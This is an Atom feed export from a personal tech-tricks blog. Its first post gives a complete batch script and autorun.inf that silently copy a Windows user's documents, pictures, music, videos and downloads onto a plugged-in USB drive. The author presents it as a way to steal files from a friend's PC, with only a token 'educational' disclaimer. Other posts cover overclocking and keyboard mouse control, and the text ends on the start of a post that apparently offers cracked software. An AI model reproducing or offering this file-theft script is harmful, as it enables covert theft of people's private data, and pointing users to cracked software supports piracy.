<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8242227210141674342</id><updated>2011-12-27T08:37:36.691-08:00</updated><category term='Software'/><category term='Games'/><category term='Tricks'/><category term='OS'/><title type='text'>My History</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3335789547342926002</id><published>2010-06-02T05:31:00.000-07:00</published><updated>2010-06-02T05:40:53.194-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>How to Steal people files using usb drive</title><content type='html'>I am going to teach you how you can do this from batch file with the help of autorun.inf file.&lt;br /&gt;Let me tell you the basic things what will happen.&lt;br /&gt;&lt;br /&gt;When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).&lt;br /&gt;&lt;br /&gt;Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.&lt;br /&gt;&lt;br /&gt;Here goes the batch code:&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;@echo off&lt;br /&gt;:CHECK&lt;br /&gt;if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"&lt;br /&gt;if exist "%systemdrive%\Documents and Settings" goto COPIER&lt;br /&gt;goto ERROR&lt;br /&gt;&lt;br /&gt;:COPIER&lt;br /&gt;if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"&lt;br /&gt;if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"&lt;br /&gt;if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"&lt;br /&gt;if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"&lt;br /&gt;if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"&lt;br /&gt;copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"&lt;br /&gt;copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"&lt;br /&gt;copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"&lt;br /&gt;copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"&lt;br /&gt;copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"&lt;br /&gt;MSG %username% "DONE!"&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;:ERROR&lt;br /&gt;exit&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.&lt;br /&gt;&lt;br /&gt;Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.&lt;br /&gt;&lt;br /&gt;This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.&lt;br /&gt;&lt;br /&gt;Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.&lt;br /&gt;&lt;br /&gt;Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.&lt;br /&gt;&lt;br /&gt;Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.&lt;br /&gt;&lt;br /&gt;This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.&lt;br /&gt;&lt;br /&gt;Now let’s create a file that will load it automatically.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[autorun]&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Open=Filename.bat&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Action=File Copier&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.&lt;br /&gt;&lt;br /&gt;Copy the two files, autorun.inf and Filename.bat in your flash drive.&lt;br /&gt;&lt;br /&gt;Then plug in your device to your friends PC and do the evil things.&lt;br /&gt;&lt;br /&gt;Where is the flaw?&lt;br /&gt;&lt;br /&gt;It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).&lt;br /&gt;&lt;br /&gt;Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.&lt;br /&gt;&lt;br /&gt;However this is just an educational tutorial.&lt;br /&gt;&lt;br /&gt;Hope this tutorial was helpful.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3335789547342926002?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3335789547342926002/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3335789547342926002' title='29 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3335789547342926002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3335789547342926002'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2010/06/how-to-steal-people-files-using-usb.html' title='How to Steal people files using usb drive'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>29</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3822919045935450388</id><published>2010-06-01T05:59:00.000-07:00</published><updated>2010-06-01T06:07:24.521-07:00</updated><title type='text'>What is Overclocking?</title><content type='html'>&lt;span name="intelliTxt" id="intelliTXT"&gt;&lt;span style="font-weight: bold;"&gt;What is Overclocking?&lt;/span&gt;&lt;br /&gt;Overclocking  is the process of making various components of your computer run at  faster speeds than they do when you first buy them. For instance, if you  buy a Pentium 4 3.2GHz processor, and you want it to run faster, you  could overclock the processor to make it run at 3.6GHz.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;¡Disclaimer!&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;WARNING&lt;/span&gt;:  Overclocking can F up your stuff. Overclocking wares down the hardware  and the life-expectancy of the entire computer will be lowered if you  overclock. If you attempt to overclock, I, Rogue_Jedi, and  Overclockers.com and its inhabitants are not responsible for anything  broken or damaged when using this guide.&lt;br /&gt;This guide is merely for  those who accept the possible outcomes of this overclocking guide/FAQ,  and overclocking in general.&lt;br /&gt;&lt;br /&gt;Why would you want to overclock?  Well, the most obvious reason is that you can get more out of a  processor than what you payed for. You can buy a relatively cheap  processor and overclock it to run at the speed of a much more expensive  processor. If you're willing to put in the time and effort, overclocking  can save you a bunch of money in the future or, if you need to be at  the bleeding edge like me, can give you a faster processor than you  could possibly buy from a store&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;The Dangers of Overclocking&lt;/span&gt;&lt;br /&gt;First  of all, let me say that if you are careful and know what you are doing,  it will be very hard for you to do any permanent damage to your  computer by overclocking. Your computer will either crash or just refuse  to boot if you are pushing the system too far. It's very hard to fry  your system by just pushing it to it's limits.&lt;br /&gt;&lt;br /&gt;There are dangers,  however. The first and most common danger is heat. When you make a  component of your computer do more work than it used to, it's going to  generate more heat. If you don't have sufficient cooling, your system  can and will overheat. By itself, overheating cannot kill your computer,  though. The only way that you will kill your computer by overheating is  if you repeatedly try to run the system at temperatures higher than  recommended. As I said, you should try to stay under 60 C.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Don't  get overly worried about overheating issues, though. You will see signs  before your system gets fried. Random crashes are the most common sign.  Overheating is also easily prevented with the use of thermal sensors  which can tell you how hot your system is running. If you see a  temperature that you think is too high, either run the system at a lower  speed or get some better cooling. I will go over cooling later in this  guide.&lt;br /&gt;&lt;br /&gt;The other "danger" of overclocking is that it can reduce  the lifespan of your components. When you run more voltage through a  component, it's lifespan decreases. A small boost won't have much of an  affect, but if you plan on using a large overclock, you will want to be  aware of the decrease in lifespan. This is not usually an issue,  however, since anybody that is overclocking likely will not be using the  same components for more than 4-5 years, and it is unlikely that any of  your components will fail before 4-5 years regardless of how much  voltage you run through it. Most processors are designed to last for up  to 10 years, so losing a few of those years is usually worth the  increase in performance in the mind of an overclocker.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;The Basics&lt;/span&gt;&lt;br /&gt;To  understand how to overclock your system, you must first understand how  your system works. The most common component to overclock is your  processor.&lt;br /&gt;&lt;br /&gt;When you buy a processor, or CPU, you will see it's  operating speed. For instance, a Pentium 4 3.2GHz CPU runs at 3.2GHz, or  3200 MHz. This is a measurement of how many clock cycles the processor  goes through in one second. A clock cycle is a period of time in which a  processor can carry out a given amount of instructions. So, logically,  the more clock cycles a processor can execute in one second, the faster  it can process information and the faster your system will run. One MHz  is one million clock cycles per second, so a 3.2GHz processor can go  through 3,200,000,000, or 3 billion two hundred million clock cycles in  every second. Pretty amazing, right?&lt;br /&gt;&lt;br /&gt;The goal of overclocking is  to raise the GHz rating of your processor so that it can go through more  clock cycles every second. The formula for the speed of your processor  if this:&lt;br /&gt;&lt;br /&gt;FSB (in MHz) x Multiplier=Speed in MHz.&lt;br /&gt;&lt;br /&gt;Now to  explain what the FSB and Multiplier are:&lt;br /&gt;&lt;br /&gt;The FSB (or, for AMD  processors, the HTT*), or Front Side Bus, is the channel through which  your entire system communicates with your CPU. So, obviously, the faster  your FSB can run, the faster your entire system can run.&lt;br /&gt;&lt;br /&gt;CPU  manufacturers have found ways to increase the effective speed of the FSB  of a CPU. They simply send more instructions in every clock cycle. So  instead of sending one instruction every one clock cycle, CPU  manufacturers have found ways to send two instructions per clock cycle  (AMD CPUs) or even four instructions per clock cycle (Intel CPUs). So,  when you look at a CPU and see it's FSB speed, you must realize that it  is not really running at that speed. Intel CPUs are "quad pumped",  meaning they send 4 instructions per clock cycle. This means that if you  see an FSB of 800MHz, the underlying FSB speed is really only 200MHz,  but it is sending 4 instructions per clock cycle so it achieves an  effective speed of 800MHz. The same logic can be applied to AMD CPUs,  but they are only "double pumped", meaning they only send 2 instructions  per clock cycle. So an FSB of 400MHz on an AMD CPU is comprised of an  underlying 200MHz FSB sending 2 instructions per clock cycle.&lt;br /&gt;&lt;br /&gt;This  is important because when you are overclocking, you will be dealing  with the real FSB speed of the CPU, not the effective CPU speed.&lt;br /&gt;&lt;br /&gt;The  multiplier portion of the speed equation is nothing more than a number  that, when multiplied by the FSB speed, will give you the total speed of  the processor. For instance, if you have a CPU that has a 200MHz FSB  (real FSB speed, before it is double or quad pumped) and has a  multiplier of 10, then the equation becomes:&lt;br /&gt;&lt;br /&gt;(FSB) 200MHz x  (Multiplier) 10= 2000MHz CPU speed, or 2.0GHz.&lt;br /&gt;&lt;br /&gt;On some CPUs, such  as the Intel processors since 1998, the multiplier is locked and cannot  be changed. On others, such as the AMD Athlon 64 processors, the  multiplier is "top locked", which means that you can change the  multiplier to a lower number but cannot raise it higher than it was  originally. On other CPUs, the multiplier is completely unlocked,  meaning you can change it to any number that you wish. This type of CPU  is an overclockers dream, since you can overclock the CPU simply by  raising the multiplier, but is very uncommon nowadays.&lt;br /&gt;&lt;br /&gt;It is much  easier to raise or lower the multiplier on a CPU than the FSB. This is  because, unlike the FSB, the multiplier only effects the CPU speed. When  you change the FSB, you are really changing the speed at which every  single component of your computer communicates with your CPU. This, in  effect, is overclocking all of the other components of your system. This  can bring about all sorts of problems when other components that you  don't intend to overclock are pushed too far and fail to work. Once you  understand how overclocking works, though, you will know how to prevent  these issues.&lt;br /&gt;&lt;br /&gt;*On AMD Athlon 64 CPUs, the term FSB is really a  misnomer. There is no FSB, per se. The FSB is integrated into the chip.  This allows the FSB to communicate with the CPU much faster than Intel's  standard FSB method. It also can cause some confusion, since the FSB on  an Athlon 64 can sometimes be referred to as the HTT. If you see  somebody talking about raising the HTT on an Athlon 64 CPU and is  talking about speeds that you recognize as common FSB speeds, then just  think of the HTT as the FSB. For the most part, they function in the  same way and can be treated the same and thinking of the HTT as the FSB  can eliminate some possible confusion.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How to Overclock&lt;/span&gt;&lt;br /&gt;So  now you understand how a processor gets it's speed rating. Great, but  how do you raise that speed?&lt;br /&gt;&lt;br /&gt;Well, the most common method of  overclocking is through the BIOS. The BIOS can be reached by pressing a  variety of keys while your system is booting up. The most common key to  get into the BIOS is the Delete key, but others may be used such as F1,  F2, any other F button, Enter, and some others. Before your system  starts loading Windows (or whatever OS you have), it should have a  screen that will tell you what button to use at the bottom.&lt;br /&gt;&lt;br /&gt;Once  you are in the BIOS, assuming that you have a BIOS that supports  overclocking*, you should have access to all of the settings needed to  overclock your system. The settings that you will most likely be  adjusting are:&lt;br /&gt;&lt;br /&gt;Multiplier, FSB, RAM Timings, RAM Speed, and RAM  Ratio.&lt;br /&gt;&lt;br /&gt;On a very basic level, all you are trying to do is to get  the highest FSB x Multiplier formula that you can achieve. The easiest  way to do this is to just raise the multiplier, but that will not work  on most processors since the multiplier is locked. The next method is to  simply raise the FSB. This is pretty self explanatory, and all of the  RAM issues that have to be dealt with when raising the FSB will be  explained below. Once you've found the speed at which the CPU won't go  any faster, you have one more option.&lt;br /&gt;&lt;br /&gt;If you really want to push  your system to the limit, you can try lowering the multiplier in order  to raise the FSB even higher. In order to understand this, imagine that  you have a 2.0GHz processor that has a 200MHz FSB and a 10x multiplier.  So 200MHz x 10=2.0GHz. Obviously, that equation works, but there are  other ways to get to 2.0GHz. You could raise the multiplier to 20 and  lower the FSB to 100MHz, or you could raise the FSB to 250MHz and lower  the multiplier to 8. Both of those combinations would give you the same  2.0GHz that you started out with. So both of those combinations should  give you the same system performance, right?&lt;br /&gt;&lt;br /&gt;Wrong. Since the FSB  is the channel through which your system communicates with your  processor, you want it to be as high as possible. So if you lowered the  FSB to 100MHz and raised the multiplier to 20, you would still have a  clock speed of 2.0GHz, but the rest of the system would be communicating  with your processor much slower than before resulting in a loss in  system performance.&lt;br /&gt;&lt;br /&gt;Ideally, you would want to lower the  multiplier in order to raise the FSB as high as possible. In principle,  this sounds easy, but it gets complicated when you involve the rest of  the system, since the rest of the system is dependent on the FSB as  well, chiefly the RAM. Which leads me to the next section on RAM.&lt;br /&gt;&lt;br /&gt;*Most  retail computer manufacturers use motherboards and BIOSes that do not  support overclocking. You won't be able to access the settings you need  from the BIOS. There are utilities that will allow you to overclock from  your desktop, such as this one, but I don't recommend them since I have  never tried them out myself.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;RAM and what it has to do with  Overclocking&lt;/span&gt;&lt;br /&gt;First and foremost, I consider this site to be the Holy  Grail of RAM information. Learn to love it&lt;br /&gt;&lt;br /&gt;As I said before, the  FSB is the pathway through which your system communicates with your CPU.  So raising the FSB, in effect, overclocks the rest of your system as  well.&lt;br /&gt;&lt;br /&gt;The component that is most affected by raising the FSB is  your RAM. When you buy RAM, it is rated at a certain speed. I'll use the  table from my post to show these speeds:&lt;br /&gt;Quote:&lt;br /&gt;PC-2100 - DDR266&lt;br /&gt;PC-2700  - DDR333&lt;br /&gt;PC-3200 - DDR400&lt;br /&gt;PC-3500 - DDR434&lt;br /&gt;PC-3700 - DDR464&lt;br /&gt;PC-4000  - DDR500&lt;br /&gt;PC-4200 - DDR525&lt;br /&gt;PC-4400 - DDR550&lt;br /&gt;PC-4800 - DDR600&lt;br /&gt;&lt;br /&gt;To  understand what this table means, lookhere. Note how the RAM's rated  speed is DDR PC-4000. Then refer to this table and see how PC-4000 is  equivalent to DDR 500.&lt;br /&gt;&lt;br /&gt;To understand this, you must first  understand how RAM works. RAM, or Random Access Memory, serves as  temporary storage of files that the CPU needs to access quickly. For  instance, when you load a level in a game, your CPU will load the level  into RAM so that it can access the information quickly whenever it needs  to, instead of loading the information from the relatively slow hard  drive.&lt;br /&gt;&lt;br /&gt;The important thing to know is that RAM functions at a  certain speed, which is much lower than the CPU speed. Most RAM today  runs at speeds between 133MHz and 300MHz. This may confuse you, since  those speeds are not listed on my chart.&lt;br /&gt;&lt;br /&gt;This is because RAM  manufacturers, much like the CPU manufacturers from before, have managed  to get RAM to send information twice every RAM clock cycle.* This is  the reason for the "DDR" in the RAM speed rating. It stands for Double  Data Rate. So DDR 400 means that the RAM operates at an effective speed  of 400MHz, with the "400" in DDR 400 standing for the clock speed. Since  it is sending instructions twice per clock cycle, that means it's real  operating frequency is 200MHz. This works much like AMD's "double  pumping" of the FSB.&lt;br /&gt;&lt;br /&gt;So go back to the RAM that I linked before.  It is listed at a speed of DDR PC-4000. PC-4000 is equivalent to DDR  500, which means that PC-4000 RAM has an effective speed of 500MHz with  an underlying 250MHz clock speed.&lt;br /&gt;&lt;br /&gt;So what does this all have to  do with overclocking?&lt;br /&gt;&lt;br /&gt;Well, as I said before, when you raise the  FSB, you effectively overclock everything else in your system. This  applies to RAM too. RAM that is rated at PC-3200 (DDR 400) is rated to  run at speeds up to 200MHz. For a non-overclocker, this is fine, since  your FSB won't be over 200MHz anyway.&lt;br /&gt;&lt;br /&gt;Problems can occur, though,  when you want to raise your FSB to speeds over 200MHz. Since the RAM is  only rated to run at speeds up to 200MHz, raising your FSB higher than  200MHz can cause your system to crash. How do you solve this? There are  three solutions: using a FSB:RAM ratio, overclocking your RAM, or simply  buying RAM rated at a higher speed.&lt;br /&gt;&lt;br /&gt;Since you probably only  understood the last of those three options, I'll explain them:&lt;br /&gt;&lt;br /&gt;FSB:RAM  Ratio: If you want to raise your FSB to a higher speed than your RAM  supports, you have the option of running your RAM at a lower speed than  your FSB. This is done using an FSB:RAM ratio. Basically, the FSB:RAM  ratio allows you to select numbers that set up a ratio between your FSB  and RAM speeds. So, say you are using the PC-3200 (DDR 400) RAM that I  mentioned before which runs at 200MHz. But you want to raise your FSB to  250MHz to overclock your CPU. Obviously, your RAM will not appreciate  the raised FSB speed and will most likely cause your system to crash. To  solve this, you can set up a 5:4 FSB:RAM ratio. Basically, this ratio  will mean that for every 5MHz that your FSB runs at, your RAM will only  run at 4MHz.&lt;br /&gt;&lt;br /&gt;To make it easier, convert the 5:4 ratio to a 100:80  ratio. So for every 100MHz your FSB runs at, your RAM will only run at  80MHz. Basically, this means that your RAM will only run at 80% of your  FSB speed. So with your 250MHz target FSB, running in a 5:4 FSB:RAM  ratio, your RAM will be running at 200MHz, which is 80% of 250MHz. This  is perfect, since your RAM is rated for 200MHz.&lt;br /&gt;&lt;br /&gt;This solution,  however, isn't ideal. Running the FSB and RAM with a ratio causes gaps  in between the time that the FSB can communicate with the RAM. This  causes slowdowns that wouldn't be there if the RAM and the FSB were  running at the same speed. If you want the most speed out of your  system, using an FSB:RAM ratio wouldn't be the best solution.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Overclocking  your RAM&lt;/span&gt;&lt;br /&gt;Overclocking your RAM is really very simple. The principle  behind overclocking RAM is the same as overclocking your CPU: to get the  RAM to run at a higher speed than it is supposed to run at. Luckily,  the similarities between the two types of overclocking end there, or  else RAM overclocking would be much more complicated than it is&lt;br /&gt;&lt;br /&gt;To  overclock RAM, you just enter the BIOS and attempt to run the RAM at a  higher speed than it is rated at. For instance, you could try to run  PC-3200 (DDR 400) RAM at a speed of 210MHz, which would be 10MHz over  the rated speed. This could work, but in some cases it will cause the  system to crash. If this happens, don't panic. The problem can be solved  pretty easily by raising the voltage to your RAM. The voltage to your  RAM, also known as vdimm, can be adjusted in most BIOSes. Raise it using  the smallest increments available and test each setting to see if it  works. Once you find a setting that works, you can either keep it or try  to push your RAM farther. If you give the RAM too much voltage,  however, it could get fried. For info on what voltages are safe, refer  back to my Holy Grail of RAM&lt;br /&gt;&lt;br /&gt;The only other thing that you have  to worry about when overclocking RAM are the latency timings. These  timings are the delays between certain RAM functions. If you want more  info on this, you know where to look Basically, if you want to raise the  speed of your RAM, you may have to raise the timings. It's not all that  complicated, though, and shouldn't be too hard to understand.&lt;br /&gt;&lt;br /&gt;That's  really all there is to it. If only overclocking the CPU were that easy&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Buying  RAM rated at a Higher Speed&lt;/span&gt;&lt;br /&gt;This one's the simplest thing in this  entire guide If you want to raise your FSB to, say, 250MHz, just buy RAM  that is rated to run at 250MHz, which would be DDR 500. The only  downside to this option is that faster RAM will cost you more than  slower RAM. Since overclocking your RAM is relatively simple, you might  want to consider buying slower RAM and overclocking it to fit your  needs. It could save you over a hundred bucks, depending on what type of  RAM you need.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;That's basically all you need to know about  RAM and overclocking. Now onto the rest of the guide.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Voltage  and how it affects Overclocking&lt;/span&gt;&lt;br /&gt;There will be a point when you are  overclocking and you simply cannot increase the speed of your CPU  anymore no matter what you do and how much cooling you have. This is  most likely because your CPU is not getting enough voltage. This is very  similar to the RAM voltage scenario that I addressed above. To solve  this, you simply up the voltage to your CPU, also known as the vcore. Do  this in the same fashion described in the RAM section. Once you have  enough voltage for the CPU to be stable, you can either keep the CPU at  that speed or attempt to overclock it even further. As with the RAM, be  careful not to overload the CPU with voltage. Each processor has  recommended voltages setup by the manufacturer. Look on the website to  find these. Try not to go past the recommended voltages.&lt;br /&gt;&lt;br /&gt;Keep in  mind that upping the voltage to your CPU will cause much greater heat  output. This is why it is essential to have good cooling when  overclocking. Which leads me to my next topic...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Cooling&lt;/span&gt;&lt;br /&gt;As  I said before, when you up the voltage to your CPU, the heat output  great increases. This makes proper cooling a necessity. Here is a good  set of links related to cooling and a few other topics.&lt;br /&gt;&lt;br /&gt;There are  basically three "levels" of case cooling:&lt;br /&gt;&lt;br /&gt;Air Cooling (Fans)&lt;br /&gt;&lt;br /&gt;Water  Cooling (look here)&lt;br /&gt;&lt;br /&gt;Peltier/Phase Change Cooling (VERY expensive  and high end cooling[/b]&lt;br /&gt;&lt;br /&gt;I really don't have much knowledge on  the Peltier/Phase Change method of cooling, so I won't address it. All  you need to know is that it could cost you upwards of $1000 dollars and  can keep your CPU at sub-zero temperatures. It's intended for VERY high  end overclockers, and I assume that nobody here will be using it.&lt;br /&gt;&lt;br /&gt;The  other two, however, are much more affordable and realistic.&lt;br /&gt;&lt;br /&gt;Everybody  knows about air cooling. If you're on a computer now (and I don't know  how you'd be seeing this if you're not ), you probably hear a constant  humming coming from it. If you look in the back, you will see a fan.  This fan is basically all that air cooling is: the use of fans to suck  cold air in and push hot air out. There are various ways to set up your  fans, but you generally want to have an equal amount of air being sucked  in and pushed out. For more info, refer to the link that I gave at the  beginning of this section.&lt;br /&gt;&lt;br /&gt;Water cooling is more expensive and  exotic than air cooling. It is basically the use of pumps and radiators  to cool your system more effectively than air cooling. For more info on  it, check out the link that I gave next to water cooling before.&lt;br /&gt;&lt;br /&gt;Those  are the two most commonly used methods of case cooling. Good case  cooling, however, is not the only component necessary for a cool  computer. The other main component is the CPU Heatsink/Fan, or HSF. The  purpose of the HSF is to channel heat away from the CPU and into the  case so that it can be pushed out from the case fans. It is necessary to  have an HSF on your CPU at all times. Your CPU will be fried in a  matter of seconds if it is not.&lt;br /&gt;&lt;br /&gt;There are tons of HSF's out  there. For a ton of info on HSF's and everything that goes with them,  check out this page again. It basically covers all you need to know  about HSF's and air cooling.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3822919045935450388?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3822919045935450388/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3822919045935450388' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3822919045935450388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3822919045935450388'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2010/06/what-is-overclocking.html' title='What is Overclocking?'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-8049915575147508902</id><published>2009-04-16T07:03:00.000-07:00</published><updated>2009-04-16T07:11:30.329-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>Control your mouse with keyboard</title><content type='html'>Mouse not work??move your mouse pointer with you keyboard&lt;br /&gt;You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.&lt;br /&gt;&lt;br /&gt;Follow the given steps to activate the keyboard mouse:&lt;br /&gt;&lt;br /&gt;   1. To edit this feature, first you should log onto your computer with administrative rights.&lt;br /&gt;   2. To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.&lt;br /&gt;   3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.&lt;br /&gt;   4. Click on Settings button, if you want to adjust the mouse cursor detail settings.&lt;br /&gt;5. Here a new dialog box will appear with the title Settings for MouseKeys, now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.&lt;br /&gt;&lt;br /&gt;Now using Numeric keypad, you can move your mouse pointer.&lt;br /&gt;&lt;br /&gt;The controls are:&lt;br /&gt;&lt;br /&gt;    * 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.&lt;br /&gt;    * Key 5 is used as mouse click button.&lt;br /&gt;    * Insert key used to hold down mouse button.&lt;br /&gt;    * + Sign used to double click on any object.&lt;br /&gt;    * Delete button used to release the mouse.&lt;br /&gt;    * Click on NumLock button to disable this keyboard mouse feature&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-8049915575147508902?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/8049915575147508902/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=8049915575147508902' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/8049915575147508902'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/8049915575147508902'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/control-your-mouse-with-keyboard.html' title='Control your mouse with keyboard'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-7323715859138607063</id><published>2009-04-14T07:52:00.000-07:00</published><updated>2009-04-14T08:05:07.872-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>UseNeXT Client 4.70 Cracked</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SeSlR58gnvI/AAAAAAAAAN4/pNqRdQDK0mo/s1600-h/4_usenext1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 236px;" 